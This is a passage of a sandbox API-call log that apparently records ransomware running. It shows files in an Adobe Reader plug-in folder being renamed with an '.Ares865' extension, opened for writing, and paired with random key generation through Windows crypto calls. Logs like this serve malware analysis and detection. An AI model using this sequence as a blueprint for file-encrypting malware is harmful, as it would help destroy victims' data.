(x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.DAN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.dan.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.426] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.427] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.427] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.427] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.429] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.430] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.430] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.431] lstrcpyW (in: lpString1=0x2cce490, lpString2="WindowsMedia.DEU" | out: lpString1="WindowsMedia.DEU") returned="WindowsMedia.DEU" [0173.431] lstrlenW (lpString="WindowsMedia.DEU") returned 16 [0173.431] lstrlenW (lpString="Ares865") returned 7 [0173.431] lstrcmpiW (lpString1="dia.DEU", lpString2="Ares865") returned 1 [0173.431] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.DEU.Ares865") returned 96 [0173.431] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.deu"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.DEU.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.deu.ares865"), dwFlags=0x1) returned 1 [0173.433] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.DEU.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.deu.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.433] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.433] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.434] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.434] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.438] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.439] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.439] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.440] lstrcpyW (in: lpString1=0x2cce490, lpString2="WindowsMedia.ESP" | out: lpString1="WindowsMedia.ESP") returned="WindowsMedia.ESP" [0173.440] lstrlenW (lpString="WindowsMedia.ESP") returned 16 [0173.440] lstrlenW (lpString="Ares865") returned 7 [0173.440] lstrcmpiW (lpString1="dia.ESP", lpString2="Ares865") returned 1 [0173.440] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.ESP.Ares865") returned 96 [0173.440] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.esp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.ESP.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.esp.ares865"), dwFlags=0x1) returned 1 [0173.445] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.ESP.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.esp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.445] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.445] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.446] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.446] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.448] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.449] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.449] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.449] lstrcpyW (in: lpString1=0x2cce490, lpString2="WindowsMedia.EUQ" | out: lpString1="WindowsMedia.EUQ") returned="WindowsMedia.EUQ" [0173.449] lstrlenW (lpString="WindowsMedia.EUQ") returned 16 [0173.449] lstrlenW (lpString="Ares865") returned 7 [0173.449] lstrcmpiW (lpString1="dia.EUQ", lpString2="Ares865") returned 1 [0173.450] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.EUQ.Ares865") returned 96 [0173.450] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.euq"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.EUQ.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.euq.ares865"), dwFlags=0x1) returned 1 [0173.451] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.EUQ.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.euq.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.452] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.452] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.453] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.453] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.455] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.455] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.455] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.456] lstrcpyW (in: lpString1=0x2cce490, lpString2="WindowsMedia.FRA" | out: lpString1="WindowsMedia.FRA") returned="WindowsMedia.FRA" [0173.456] lstrlenW (lpString="WindowsMedia.FRA") returned 16 [0173.456] lstrlenW (lpString="Ares865") returned 7 [0173.456] lstrcmpiW (lpString1="dia.FRA", lpString2="Ares865") returned 1 [0173.456] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.FRA.Ares865") returned 96 [0173.456] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.fra"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.FRA.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.fra.ares865"), dwFlags=0x1) returned 1 [0173.458] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.FRA.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.fra.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.458] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.458] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.459] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.459] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.461] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.462] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.462] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.462] lstrcpyW (in: lpString1=0x2cce490, lpString2="WindowsMedia.ITA" | out: lpString1="WindowsMedia.ITA") returned="WindowsMedia.ITA" [0173.462] lstrlenW (lpString="WindowsMedia.ITA") returned 16 [0173.462] lstrlenW (lpString="Ares865") returned 7 [0173.462] lstrcmpiW (lpString1="dia.ITA", lpString2="Ares865") returned 1 [0173.463] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.ITA.Ares865") returned 96 [0173.463] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.ita"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.ITA.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.ita.ares865"), dwFlags=0x1) returned 1 [0173.464] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.ITA.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.ita.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.465] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.465] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.466] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.466] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.468] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.469] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.469] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.469] lstrcpyW (in: lpString1=0x2cce490, lpString2="WindowsMedia.JPN" | out: lpString1="WindowsMedia.JPN") returned="WindowsMedia.JPN" [0173.469] lstrlenW (lpString="WindowsMedia.JPN") returned 16 [0173.469] lstrlenW (lpString="Ares865") returned 7 [0173.469] lstrcmpiW (lpString1="dia.JPN", lpString2="Ares865") returned 1 [0173.470] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.JPN.Ares865") returned 96 [0173.470] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.jpn"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.JPN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.jpn.ares865"), dwFlags=0x1) returned 1 [0173.472] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.JPN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.jpn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.472] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.472] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.473] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.473] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.475] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.476] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.476] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.476] lstrcpyW (in: lpString1=0x2cce490, lpString2="WindowsMedia.KOR" | out: lpString1="WindowsMedia.KOR") returned="WindowsMedia.KOR" [0173.476] lstrlenW (lpString="WindowsMedia.KOR") returned 16 [0173.476] lstrlenW (lpString="Ares865") returned 7 [0173.476] lstrcmpiW (lpString1="dia.KOR", lpString2="Ares865") returned 1 [0173.477] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.KOR.Ares865") returned 96 [0173.477] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.kor"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.KOR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.kor.ares865"), dwFlags=0x1) returned 1 [0173.478] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.KOR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.kor.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.479] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.479] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.480] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.480] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.482] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.482] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.482] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.483] lstrcpyW (in: lpString1=0x2cce490, lpString2="WindowsMedia.mpp" | out: lpString1="WindowsMedia.mpp") returned="WindowsMedia.mpp" [0173.483] lstrlenW (lpString="WindowsMedia.mpp") returned 16 [0173.483] lstrlenW (lpString="Ares865") returned 7 [0173.483] lstrcmpiW (lpString1="dia.mpp", lpString2="Ares865") returned 1 [0173.483] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.mpp.Ares865") returned 96 [0173.484] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.mpp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.mpp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.mpp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.mpp.ares865"), dwFlags=0x1) returned 1 [0173.485] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.mpp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.mpp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.485] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=218112) returned 1 [0173.486] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.486] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.486] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.501] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.501] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.501] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.505] lstrcpyW (in: lpString1=0x2cce490, lpString2="WindowsMedia.NLD" | out: lpString1="WindowsMedia.NLD") returned="WindowsMedia.NLD" [0173.505] lstrlenW (lpString="WindowsMedia.NLD") returned 16 [0173.505] lstrlenW (lpString="Ares865") returned 7 [0173.505] lstrcmpiW (lpString1="dia.NLD", lpString2="Ares865") returned 1 [0173.505] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.NLD.Ares865") returned 96 [0173.505] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.nld"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.NLD.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.nld.ares865"), dwFlags=0x1) returned 1 [0173.507] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.NLD.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.nld.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.507] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.507] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.508] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.508] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.510] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.511] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.511] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.511] lstrcpyW (in: lpString1=0x2cce490, lpString2="WindowsMedia.NOR" | out: lpString1="WindowsMedia.NOR") returned="WindowsMedia.NOR" [0173.511] lstrlenW (lpString="WindowsMedia.NOR") returned 16 [0173.511] lstrlenW (lpString="Ares865") returned 7 [0173.511] lstrcmpiW (lpString1="dia.NOR", lpString2="Ares865") returned 1 [0173.512] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.NOR.Ares865") returned 96 [0173.512] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.nor"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.NOR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.nor.ares865"), dwFlags=0x1) returned 1 [0173.521] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.NOR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.nor.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.521] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.521] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.522] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.522] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.524] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.525] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.525] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.525] lstrcpyW (in: lpString1=0x2cce490, lpString2="WindowsMedia.PTB" | out: lpString1="WindowsMedia.PTB") returned="WindowsMedia.PTB" [0173.525] lstrlenW (lpString="WindowsMedia.PTB") returned 16 [0173.526] lstrlenW (lpString="Ares865") returned 7 [0173.526] lstrcmpiW (lpString1="dia.PTB", lpString2="Ares865") returned 1 [0173.526] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.PTB.Ares865") returned 96 [0173.526] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.ptb"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.PTB.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 